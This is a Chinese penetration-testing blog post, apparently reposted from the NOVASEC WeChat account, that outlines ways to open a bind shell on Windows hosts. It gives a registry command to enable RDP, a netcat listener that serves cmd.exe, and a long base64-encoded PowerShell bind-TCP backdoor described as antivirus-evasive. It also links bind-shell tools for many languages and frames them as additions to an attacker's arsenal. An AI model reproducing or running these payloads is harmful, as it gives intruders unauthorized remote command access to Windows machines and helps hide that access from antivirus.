反弹shell之Windows正向shell

admin
admin
admin
138876
文章
114
评论
2021年2月26日10:00:50评论493 views字数 10791阅读35分58秒阅读模式

△△△点击上方“蓝字”关注我们了解更多精彩





用心是我的选择,吵闹是我的不安。
我肯定在很久以前就用心爱你,
你觉得太快,我觉得太慢。
想带你去看满天星辰,最亮的一颗是我。
骄傲如我,最终还是我,只是我。



0x00 简介

shell:

在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。

它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。

 

正向shell:被控端监听端口,控制端主动发起连接去连接被控端。


反向shell:控制端监听端口,被控端主动发起连接连接控制端。

 

  在渗透环境中,通常由于被控端因防火墙受限、权限不足、端口被占用等情形。 会导致通常进入被控制端的数据包会被拦截等原因的无法连接。 而被控制端主动向外发送的数据包通常都不会被拦截。

  因此,在渗透过程中反向shell更加符合实战的条件。但是,渗透的环境是不确定的,因此我们也要需要了解一下正向shell的实现,丰富我们的攻击。

  个人认为在windows下使用非原生工具的反向或正向shell有些鸡肋,需要进一步升级为cs等的多功能shellcode才有利于更一步进攻。


反弹shell之Windows正向shell


由于内容比较多,所以我也没有进行完整的研究,只出一个提纲,大家有兴趣的可以自己深入了解。


0x01 RDP GUI
Windows远程桌面管理服务
#注册表开启RDP远程桌面HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server下的"fDenyTSConnections"=dword:00000001#这个值对于没开远程桌面的是1,已开的是0#cmd开启RDP服务reg add    "HKLMSOFTWAREPoliciesMicrosoftWindows NTTerminal Services" /v fDenyTSConnections /t REG_DWORD /d 0#cmd关闭RDP服务reg delete "HKLMSOFTWAREPoliciesMicrosoftWindows NTTerminal Services" /F



0x02 telnet远程连接

1、安装telnet服务端和客户端       打开控制面板—>程序—>打开或关闭Windows功能2、被控端开启telnet服务:        net start telnet3、控制端:telnet 远程IP
#win10新版Windows功能里面好像没有telnet服务端这个选项,应该有其他的开启方式。

类似还可以使用windows横向移动的常见方式(WMI、PStools、winRM、winRS)等方法进行远程管理。
winRM横向移动参考https://blog.csdn.net/lhh134/article/details/104333583


0x03 VNC GUI
        VNC是类似RDP远程桌面的图形化远程管理工具,服务端支持正向监听和反向连接客户端。CS自带了编译为vncdll的vnc服务端。
powershell Invoke-Vnchttps://github.com/klsecservices/Invoke-Vnc#powershell在内存中执行VNC反向连接或绑定到指定端口。
jsmpeg-vnchttps://github.com/phoboslab/jsmpeg-vnc#免安装的VNC服务器和客户端,可在用浏览器作为客户端控制
tightvnc 免安装版#免安装的VNC服务端和客户端#不知道从哪里获取的版本,公众号回复【共享】获取文件



0x04 netcat正向shell

被攻击服务器执行:

nc -lp 44444 -vv -e cmd.exe
攻击主机执行:
nc 192.168.88.1 4444

PS:NC不免杀,可以尝试使用ncat、socat、 cryptcat、gonc、...等等工具进行替代。



0x05 powershell bind
powershell-reverse-tcphttps://github.com/ivan-sincek/powershell-reverse-tcp包含正向bind与反向shell的powershell脚本。

#powershell_bind_tcp_manual.ps1 免杀
#powershell_bind_tcp_manual.ps1.bat 免杀PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABwAG8AcgB0ACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAiACkALgBUAHIAaQBtACgAKQA7AA0ACgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAiADsADQAKAGkAZgAgACgAJABwAG8AcgB0AC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAKQAgAHsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUABvAHIAdAAgAG4AdQBtAGIAZQByACAAaQBzACAAcgBlAHEAdQBpAHIAZQBkACIAOwANAAoAfQAgAGUAbABzAGUAIAB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAHcAZQByAFMAaABlAGwAbAAgAEIAaQBuAGQAIABUAEMAUAAgAHYAMQAuADEAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHkAIABJAHYAYQBuACAAUwBpAG4AYwBlAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAARwBpAHQASAB1AGIAIAByAGUAcABvAHMAaQB0AG8AcgB5ACAAYQB0ACAAZwBpAHQAaAB1AGIALgBjAG8AbQAvAGkAdgBhAG4ALQBzAGkAbgBjAGUAawAvAHAAbwB3AGUAcgBzAGgAZQBsAGwALQByAGUAdgBlAHIAcwBlAC0AdABjAHAALgAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIABGAGUAZQBsACAAZgByAGUAZQAgAHQAbwAgAGQAbwBuAGEAdABlACAAYgBpAHQAYwBvAGkAbgAgAGEAdAAgADEAQgByAFoATQA2AFQANwBHADkAUgBOADgAdgBiAGEAYgBuAGYAWAB1ADQATQA2AEwAcABnAHoAdABxADYAWQAxADQALgAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIgA7AA0ACgAJACQAbABpAHMAdABlAG4AZQByACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAYwBsAGkAZQBuAHQAIAA9ACAAJABuAHUAbABsADsADQAKAAkAJABzAHQAcgBlAGEAbQAgAD0AIAAkAG4AdQBsAGwAOwANAAoACQAkAGIAdQBmAGYAZQByACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAdwByAGkAdABlAHIAIAA9ACAAJABuAHUAbABsADsADQAKAAkAJABkAGEAdABhACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAcgBlAHMAdQBsAHQAIAA9ACAAJABuAHUAbABsADsADQAKAAkAdAByAHkAIAB7AA0ACgAJAAkAIwAgAGMAaABhAG4AZwBlACAAdABoAGUAIABwAG8AcgB0ACAAbgB1AG0AYgBlAHIAIABhAHMAIABuAGUAYwBlAHMAcwBhAHIAeQANAAoACQAJACQAbABpAHMAdABlAG4AZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABMAGkAcwB0AGUAbgBlAHIAKAAiADAALgAwAC4AMAAuADAAIgAsACAAJABwAG8AcgB0ACkAOwANAAoACQAJACQAbABpAHMAdABlAG4AZQByAC4AUwB0AGEAcgB0ACgAKQA7AA0ACgAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBhAGMAawBkAG8AbwByACAAaQBzACAAdQBwACAAYQBuAGQAIAByAHUAbgBuAGkAbgBnAC4ALgAuACIAOwANAAoACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwANAAoACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFcAYQBpAHQAaQBuAGcAIABmAG8AcgAgAGMAbABpAGUAbgB0ACAAdABvACAAYwBvAG4AbgBlAGMAdAAuAC4ALgAiADsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAiADsADQAKAAkACQBkAG8AIAB7AA0ACgAJAAkACQAjACAAbgBvAG4ALQBiAGwAbwBjAGsAaQBuAGcAIABtAGUAdABoAG8AZAANAAoACQAJAAkAaQBmACAAKAAkAGwAaQBzAHQAZQBuAGUAcgAuAFAAZQBuAGQAaQBuAGcAKAApACkAIAB7AA0ACgAJAAkACQAJACQAYwBsAGkAZQBuAHQAIAA9ACAAJABsAGkAcwB0AGUAbgBlAHIALgBBAGMAYwBlAHAAdABUAGMAcABDAGwAaQBlAG4AdAAoACkAOwANAAoACQAJAAkAfQAgAGUAbABzAGUAIAB7AA0ACgAJAAkACQAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAA1ADAAMAA7AA0ACgAJAAkACQB9AA0ACgAJAAkAfQAgAHcAaABpAGwAZQAgACgAJABjAGwAaQBlAG4AdAAgAC0AZQBxACAAJABuAHUAbABsACkAOwANAAoACQAJACQAbABpAHMAdABlAG4AZQByAC4AUwB0AG8AcAAoACkAOwANAAoACQAJACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AA0ACgAJAAkAJABiAHUAZgBmAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsADQAKAAkACQAkAGUAbgBjAG8AZABpAG4AZwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcAOwANAAoACQAJACQAdwByAGkAdABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACgAJABzAHQAcgBlAGEAbQApADsADQAKAAkACQAkAHcAcgBpAHQAZQByAC4AQQB1AHQAbwBGAGwAdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBDAGwAaQBlAG4AdAAgAGMAbwBuAG4AZQBjAHQAZQBkACEAIgA7AA0ACgAJAAkAJABiAHkAdABlAHMAIAA9ACAAMAA7AA0ACgAJAAkAZABvACAAewANAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACIAUABTAD4AIgApADsADQAKAAkACQAJAGQAbwAgAHsADQAKAAkACQAJAAkAJABiAHkAdABlAHMAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAIAAkAGIAdQBmAGYAZQByAC4ATABlAG4AZwB0AGgAKQA7AA0ACgAJAAkACQAJAGkAZgAgACgAJABiAHkAdABlAHMAIAAtAGcAdAAgADAAKQAgAHsADQAKAAkACQAJAAkACQAkAGQAYQB0AGEAIAA9ACAAJABkAGEAdABhACAAKwAgACQAZQBuAGMAbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwApADsADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQAgAHcAaABpAGwAZQAgACgAJABzAHQAcgBlAGEAbQAuAEQAYQB0AGEAQQB2AGEAaQBsAGEAYgBsAGUAKQA7AA0ACgAJAAkACQBpAGYAIAAoACQAZABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7AA0ACgAJAAkACQAJAHQAcgB5ACAAewANAAoACQAJAAkACQAJACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBDAG8AbQBtAGEAbgBkACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnADsADQAKAAkACQAJAAkAfQAgAGMAYQB0AGMAaAAgAHsADQAKAAkACQAJAAkACQAkAHIAZQBzAHUAbAB0ACAAPQAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ASQBuAG4AZQByAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAAkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQBMAGkAbgBlACgAJAByAGUAcwB1AGwAdAApADsADQAKAAkACQAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwANAAoACQAJAAkAfQANAAoACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAIAAwACkAOwANAAoACQB9ACAAYwBhAHQAYwBoACAAewANAAoACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQB9ACAAZgBpAG4AYQBsAGwAeQAgAHsADQAKAAkACQBpAGYAIAAoACQAbABpAHMAdABlAG4AZQByACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKAAkACQAJACQAbABpAHMAdABlAG4AZQByAC4AUwBlAHIAdgBlAHIALgBDAGwAbwBzAGUAKAApADsADQAKAAkACQAJACQAbABpAHMAdABlAG4AZQByAC4AUwBlAHIAdgBlAHIALgBEAGkAcwBwAG8AcwBlACgAKQA7AA0ACgAJAAkAfQANAAoACQAJAGkAZgAgACgAJAB3AHIAaQB0AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AA0ACgAJAAkACQAkAHcAcgBpAHQAZQByAC4AQwBsAG8AcwBlACgAKQA7AA0ACgAJAAkACQAkAHcAcgBpAHQAZQByAC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAcwB0AHIAZQBhAG0AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAJABzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwANAAoACQAJAAkAJABzAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsADQAKAAkACQB9AA0ACgAJAAkAaQBmACAAKAAkAGMAbABpAGUAbgB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKAAkACQAJACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsADQAKAAkACQAJACQAYwBsAGkAZQBuAHQALgBEAGkAcwBwAG8AcwBlACgAKQA7AA0ACgAJAAkAfQANAAoACQAJAGkAZgAgACgAJABiAHUAZgBmAGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AA0ACgAJAAkACQAkAGIAdQBmAGYAZQByAC4AQwBsAGUAYQByACgAKQA7AA0ACgAJAAkAfQANAAoACQAJAGkAZgAgACgAJABkAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKAAkACQAJAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZABhAHQAYQAiADsADQAKAAkACQB9AA0ACgAJAAkAaQBmACAAKAAkAHIAZQBzAHUAbAB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKAAkACQAJAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAcgBlAHMAdQBsAHQAIgA7AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgA=
#点击后运行后需要手动交互输入端口号。考虑修改文件,bind固定端口。




0x06 python 
#Windows正向绑定shell和反向反弹shell的Python代码参考:https://www.cnblogs.com/KevinGeorge/p/9780151.html#已测试运行正常



0x07 Java
JavaBindShell #Java 正向连接后门:https://github.com/melardev/JavaBindShell#支持windows与linux,未进行测试



0x08 NodeJs
#JSgen #生成Node.js中的SSJI绑定和反向转换外壳JS代码生成器https://pentesterslife.blog/2018/06/28/jsgen/https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py



0x09 C-CPP-CSharp
C_Win32BindShellhttps://github.com/melardev/C_Win32BindShell

CppQtBindShellhttps://github.com/melardev/CppQtBindShell

.NetCSharpBindShellhttps://github.com/melardev/.NetCSharpBindShell



0x10 golang
GoBindShell https://github.com/melardev/GoBindShell简单的golang跨平台bind shell



0x11 ruby
Ruby-Bind-and-Reverse-Shellshttps://github.com/Hood3dRob1n/Ruby-Bind-and-Reverse-Shells#未进行测试,理论上支持跨平台



0x12 icmp-bindshell
#基于ICMP正向绑定shell的python3.x脚本https://github.com/dc401/icmp-bindshell#过于复杂,未进行测试




0x13 Summary 总结

本文仅供技术参考,勿用于非法用途,否则后果自负。


END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

或添NOVASEC-MOYU以便于及时回复。

反弹shell之Windows正向shell


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):反弹shell之Windows正向shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年2月26日10:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   反弹shell之Windows正向shellhttps://cn-sec.com/archives/273382.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息